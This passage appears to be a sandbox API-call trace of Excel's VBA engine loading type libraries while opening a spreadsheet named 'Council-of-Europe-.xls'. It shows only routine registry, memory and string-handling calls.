0x10bfbe [0155.348] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBAProject") returned 0x10bfbe [0155.348] IMalloc:Alloc (This=0x7fefecb5380, cb=0x18) returned 0x7aa0a70 [0155.348] IMalloc:Free (This=0x7fefecb5380, pv=0x787f1c0) [0155.348] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x787f1c0 [0155.348] IMalloc:Realloc (This=0x7fefecb5380, pv=0x787f1c0, cb=0x44) returned 0x51e14e0 [0155.348] IMalloc:Free (This=0x7fefecb5380, pv=0x7aa0a70) [0155.348] strcpy_s (in: _Dst=0x9808a98, _DstSize=0xb, _Src="VBAProject" | out: _Dst="VBAProject") returned 0x0 [0155.355] CLSIDFromString (in: lpsz="{00020430-0000-0000-C000-000000000046}", pclsid=0x1cfc60 | out: pclsid=0x1cfc60*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0155.356] wcsncpy_s (in: _Destination=0x9a71998, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _MaxCount=0x30 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#") returned 0x0 [0155.356] wcscpy_s (in: _Destination=0x9a719f8, _SizeInWords=0x2f, _Source="C:\\Windows\\System32\\stdole2.tlb" | out: _Destination="C:\\Windows\\System32\\stdole2.tlb") returned 0x0 [0155.356] wcscpy_s (in: _Destination=0x9a71a36, _SizeInWords=0x10, _Source="#OLE Automation" | out: _Destination="#OLE Automation") returned 0x0 [0155.356] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9c62140, cb=0x680) returned 0xa13c120 [0155.356] wcscpy_s (in: _Destination=0xa13c3e0, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0155.356] wcsncpy_s (in: _Destination=0x1cf8b0, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0155.356] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0155.356] IMalloc:Alloc (This=0x7fefecb5380, cb=0xbe) returned 0x9c9de50 [0155.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x9c9de50, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0155.357] IMalloc:Free (This=0x7fefecb5380, pv=0x9c9de50) [0155.357] wcscpy_s (in: _Destination=0xa129900, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0155.357] wcsncpy_s (in: _Destination=0x1cf8f0, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0155.357] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0155.357] IMalloc:Alloc (This=0x7fefecb5380, cb=0xbe) returned 0x9c9de50 [0155.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x9c9de50, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0155.357] IMalloc:Free (This=0x7fefecb5380, pv=0x9c9de50) [0155.357] wcsncpy_s (in: _Destination=0x1cf8b0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.357] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1cf7e0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.357] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0 [0155.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x1cfb90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0155.357] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0155.357] strcpy_s (in: _Dst=0x1cf970, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0155.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1cf970, cbMultiByte=7, lpWideCharStr=0x1cf7c0, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0155.357] IUnknown:AddRef (This=0x9ab5f00) returned 0x3 [0155.357] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="stdole", lHashVal=0x106093, pfName=0x1cf890, pBstrLibName=0x1cf7c0 | out: pfName=0x1cf890*=0, pBstrLibName=0x1cf7c0) returned 0x0 [0155.358] IUnknown:Release (This=0x9ab5f00) returned 0x2 [0155.358] IUnknown:AddRef (This=0x9ab4b50) returned 0x2 [0155.358] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="stdole", lHashVal=0x106093, pfName=0x1cf890, pBstrLibName=0x1cf7c0 | out: pfName=0x1cf890*=0, pBstrLibName=0x1cf7c0) returned 0x0 [0155.358] IUnknown:Release (This=0x9ab4b50) returned 0x1 [0155.358] IMalloc:Alloc (This=0x7fefecb5380, cb=0x208) returned 0x7ae6330 [0155.358] wcscpy_s (in: _Destination=0x9a71998, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation") returned 0x0 [0155.358] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x1cef70 | out: phkResult=0x1cef70*=0xcd2) returned 0x0 [0155.358] RegOpenKeyW (in: hKey=0xcd2, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x1cef68 | out: phkResult=0x1cef68*=0xcb6) returned 0x0 [0155.359] RegEnumKeyW (in: hKey=0xcb6, dwIndex=0x0, lpName=0x1cef98, cchName=0xa | out: lpName="1.0") returned 0x0 [0155.359] RegEnumKeyW (in: hKey=0xcb6, dwIndex=0x1, lpName=0x1cef98, cchName=0xa | out: lpName="2.0") returned 0x0 [0155.359] wcscpy_s (in: _Destination=0x1cef80, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0155.359] RegOpenKeyW (in: hKey=0xcb6, lpSubKey="2.0", phkResult=0x1cf028 | out: phkResult=0x1cf028*=0xf76) returned 0x0 [0155.360] _ultoa_s (in: _Val=0x0, _DstBuf=0x1cefa0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0155.360] RegOpenKeyA (in: hKey=0xf76, lpSubKey="0", phkResult=0x1cef90 | out: phkResult=0x1cef90*=0xd96) returned 0x0 [0155.360] RegOpenKeyW (in: hKey=0xd96, lpSubKey="win64", phkResult=0x1cef98 | out: phkResult=0x1cef98*=0xc9e) returned 0x0 [0155.361] RegCloseKey (hKey=0xc9e) returned 0x0 [0155.361] RegCloseKey (hKey=0xd96) returned 0x0 [0155.361] _ultow_s (in: _Value=0x0, _Buffer=0x1cf030, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0155.361] RegOpenKeyW (in: hKey=0xf76, lpSubKey="0", phkResult=0x1cf008 | out: phkResult=0x1cf008*=0xd96) returned 0x0 [0155.361] RegQueryValueW (in: hKey=0xd96, lpSubKey="win64", lpData=0x1cf050, lpcbData=0x1cf004 | out: lpData="C:\\Windows\\system32\\stdole2.tlb", lpcbData=0x1cf004) returned 0x0 [0155.362] wcscpy_s (in: _Destination=0x7ae6330, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0155.362] RegCloseKey (hKey=0xd96) returned 0x0 [0155.362] RegCloseKey (hKey=0xf76) returned 0x0 [0155.362] RegCloseKey (hKey=0xcb6) returned 0x0 [0155.362] RegCloseKey (hKey=0xcd2) returned 0x0 [0155.363] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x1cf678*=0x0 | out: pptlib=0x1cf678*=0x9ab64a0) returned 0x0 [0155.363] IUnknown:QueryInterface (in: This=0x9ab64a0, riid=0x7fee51c5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1cf478 | out: ppvObject=0x1cf478*=0x0) returned 0x80004002 [0155.363] ITypeLib:RemoteGetLibAttr (in: This=0x9ab64a0, ppTLibAttr=0x1cf470, pDummy=0x10 | out: ppTLibAttr=0x1cf470, pDummy=0x10) returned 0x0 [0155.363] ITypeLib:RemoteGetDocumentation (in: This=0x9ab64a0, index=-1, refPtrFlags=0x0, pbstrName=0x1cf468, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x9a719f6 | out: pbstrName=0x1cf468*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x9a719f6) returned 0x0 [0155.363] StringFromGUID2 (in: rguid=0x9c33410*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x1cf490, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0155.363] _ultow_s (in: _Value=0x2, _Buffer=0x1cf3da, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0155.363] _ultow_s (in: _Value=0x0, _Buffer=0x1cf3de, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0155.363] _ultow_s (in: _Value=0x0, _Buffer=0x1cf3e2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0155.363] wcscpy_s (in: _Destination=0x9a71a78, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0155.363] wcscpy_s (in: _Destination=0x9a71a7e, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0155.363] wcscpy_s (in: _Destination=0x9a71aca, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0155.363] wcscpy_s (in: _Destination=0x9a71ad8, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0155.363] wcscpy_s (in: _Destination=0x9a71b18, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0155.364] ITypeLib:LocalReleaseTLibAttr (This=0x9ab64a0) returned 0x0 [0155.364] wcscpy_s (in: _Destination=0x7ae6330, _SizeInWords=0x104, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0155.364] wcscpy_s (in: _Destination=0xa13c4a0, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0155.364] IMalloc:Free (This=0x7fefecb5380, pv=0x7ae6330) [0155.364] IUnknown:AddRef (This=0x9ab64a0) returned 0x4 [0155.364] IUnknown:QueryInterface (in: This=0x9ab64a0, riid=0x7fee51c85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1cf6d8 | out: ppvObject=0x1cf6d8*=0x0) returned 0x80004002 [0155.364] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="stdole", lHashVal=0x106093, pfName=0x1cf890, pBstrLibName=0x1cf7c0 | out: pfName=0x1cf890*=0, pBstrLibName=0x1cf7c0) returned 0x0 [0155.364] IUnknown:Release (This=0x9ab64a0) returned 0x3 [0155.364] IMalloc:Alloc (This=0x7fefecb5380, cb=0x24) returned 0x99227e0 [0155.364] IMalloc:Free (This=0x7fefecb5380, pv=0x51e14e0) [0155.364] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991f900 [0155.364] IMalloc:Realloc (This=0x7fefecb5380, pv=0x991f900, cb=0x50) returned 0x9bbd830 [0155.364] IMalloc:Free (This=0x7fefecb5380, pv=0x99227e0) [0155.365] IMalloc:Alloc (This=0x7fefecb5380, cb=0x94) returned 0x5234700 [0155.365] IMalloc:Free (This=0x7fefecb5380, pv=0x5234700) [0155.365] CLSIDFromString (in: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", pclsid=0x1cfc60 | out: pclsid=0x1cfc60*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52))) returned 0x0 [0155.365] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c91d10 [0155.365] _ultow_s (in: _Value=0x2, _Buffer=0x1cfaea, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0155.365] _ultow_s (in: _Value=0x8, _Buffer=0x1cfaee, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0155.365] _ultow_s (in: _Value=0x0, _Buffer=0x1cfaf2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0155.365] wcscpy_s (in: _Destination=0x7bd1488, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0155.365] wcscpy_s (in: _Destination=0x7bd148e, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0155.366] wcscpy_s (in: _Destination=0x7bd14da, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0155.366] wcscpy_s (in: _Destination=0x7bd14e8, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL") returned 0x0 [0155.366] wcscpy_s (in: _Destination=0x7bd1568, _SizeInWords=0x25, _Source="Microsoft Office 15.0 Object Library" | out: _Destination="Microsoft Office 15.0 Object Library") returned 0x0 [0155.366] IMalloc:Free (This=0x7fefecb5380, pv=0x9c91d10) [0155.367] wcsncpy_s (in: _Destination=0x7f554e8, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _MaxCount=0x30 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#") returned 0x0 [0155.367] wcscpy_s (in: _Destination=0x7f55548, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL") returned 0x0 [0155.368] wcscpy_s (in: _Destination=0x7f555c6, _SizeInWords=0x26, _Source="#Microsoft Office 15.0 Object Library" | out: _Destination="#Microsoft Office 15.0 Object Library") returned 0x0 [0155.368] wcscpy_s (in: _Destination=0xa13c560, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0155.368] wcsncpy_s (in: _Destination=0x1cf8b0, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0155.368] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library") returned 0x94 [0155.368] IMalloc:Alloc (This=0x7fefecb5380, cb=0x12a) returned 0xa0efa00 [0155.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library", cchWideChar=149, lpMultiByteStr=0xa0efa00, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library", lpUsedDefaultChar=0x0) returned 149 [0155.368] IMalloc:Free (This=0x7fefecb5380, pv=0xa0efa00) [0155.368] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa1295b0, cb=0x880) returned 0xa13c7b0 [0155.368] wcscpy_s (in: _Destination=0xa13cbf0, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0155.368] wcsncpy_s (in: _Destination=0x1cf8f0, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0155.368] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library") returned 0x94 [0155.368] IMalloc:Alloc (This=0x7fefecb5380, cb=0x12a) returned 0xa0efa00 [0155.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library", cchWideChar=149, lpMultiByteStr=0xa0efa00, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office15\\mso.dll#microsoft office 15.0 object library", lpUsedDefaultChar=0x0) returned 149 [0155.368] IMalloc:Free (This=0x7fefecb5380, pv=0xa0efa00) [0155.368] wcsncpy_s (in: _Destination=0x1cf8b0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.368] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1cf7e0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.368] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0 [0155.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x1cfb90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0155.369] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0155.369] strcpy_s (in: _Dst=0x1cf970, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0155.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1cf970, cbMultiByte=7, lpWideCharStr=0x1cf7c0, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0155.369] IUnknown:AddRef (This=0x9ab5f00) returned 0x3 [0155.369] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="Office", lHashVal=0x107515, pfName=0x1cf890, pBstrLibName=0x1cf7c0 | out: pfName=0x1cf890*=0, pBstrLibName=0x1cf7c0) returned 0x0 [0155.369] IUnknown:Release (This=0x9ab5f00) returned 0x2 [0155.369] IUnknown:AddRef (This=0x9ab4b50) returned 0x2 [0155.369] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="Office", lHashVal=0x107515, pfName=0x1cf890, pBstrLibName=0x1cf7c0 | out: pfName=0x1cf890*=0, pBstrLibName=0x1cf7c0) returned 0x0 [0155.369] IUnknown:Release (This=0x9ab4b50) returned 0x1 [0155.369] IUnknown:AddRef (This=0x9ab64a0) returned 0x4 [0155.369] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="Office", lHashVal=0x107515, pfName=0x1cf890, pBstrLibName=0x1cf7c0 | out: pfName=0x1cf890*=0, pBstrLibName=0x1cf7c0) returned 0x0 [0155.369] IUnknown:Release (This=0x9ab64a0) returned 0x3 [0155.369] IMalloc:Alloc (This=0x7fefecb5380, cb=0x208) returned 0x7ae6330 [0155.369] wcscpy_s (in: _Destination=0x7f554e8, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL#Microsoft Office 15.0 Object Library") returned 0x0 [0155.369] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x1cef70 | out: phkResult=0x1cef70*=0xcd2) returned 0x0 [0155.370] RegOpenKeyW (in: hKey=0xcd2, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x1cef68 | out: phkResult=0x1cef68*=0xf76) returned 0x0 [0155.370] RegEnumKeyW (in: hKey=0xf76, dwIndex=0x0, lpName=0x1cef98, cchName=0xa | out: lpName="2.6") returned 0x0 [0155.371] RegEnumKeyW (in: hKey=0xf76, dwIndex=0x1, lpName=0x1cef98, cchName=0xa | out: lpName="2.7") returned 0x0 [0155.371] RegEnumKeyW (in: hKey=0xf76, dwIndex=0x2, lpName=0x1cef98, cchName=0xa | out: lpName="2.8") returned 0x0 [0155.371] wcscpy_s (in: _Destination=0x1cef80, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0155.372] RegOpenKeyW (in: hKey=0xf76, lpSubKey="2.8", phkResult=0x1cf028 | out: phkResult=0x1cf028*=0xc9e) returned 0x0 [0155.372] _ultoa_s (in: _Val=0x0, _DstBuf=0x1cefa0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0155.372] RegOpenKeyA (in: hKey=0xc9e, lpSubKey="0", phkResult=0x1cef90 | out: phkResult=0x1cef90*=0xca2) returned 0x0 [0155.373] RegOpenKeyW (in: hKey=0xca2, lpSubKey="win64", phkResult=0x1cef98 | out: phkResult=0x1cef98*=0xcaa) returned 0x0 [0155.373] RegCloseKey (hKey=0xcaa) returned 0x0 [0155.373] RegCloseKey (hKey=0xca2) returned 0x0 [0155.373] _ultow_s (in: _Value=0x0, _Buffer=0x1cf030, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0155.373] RegOpenKeyW (in: hKey=0xc9e, lpSubKey="0", phkResult=0x1cf008 | out: phkResult=0x1cf008*=0xca6) returned 0x0 [0155.374] RegQueryValueW (in: hKey=0xca6, lpSubKey="win64", lpData=0x1cf050, lpcbData=0x1cf004 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x1cf004) returned 0x0 [0155.375] wcscpy_s (in: _Destination=0x7ae6330, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program 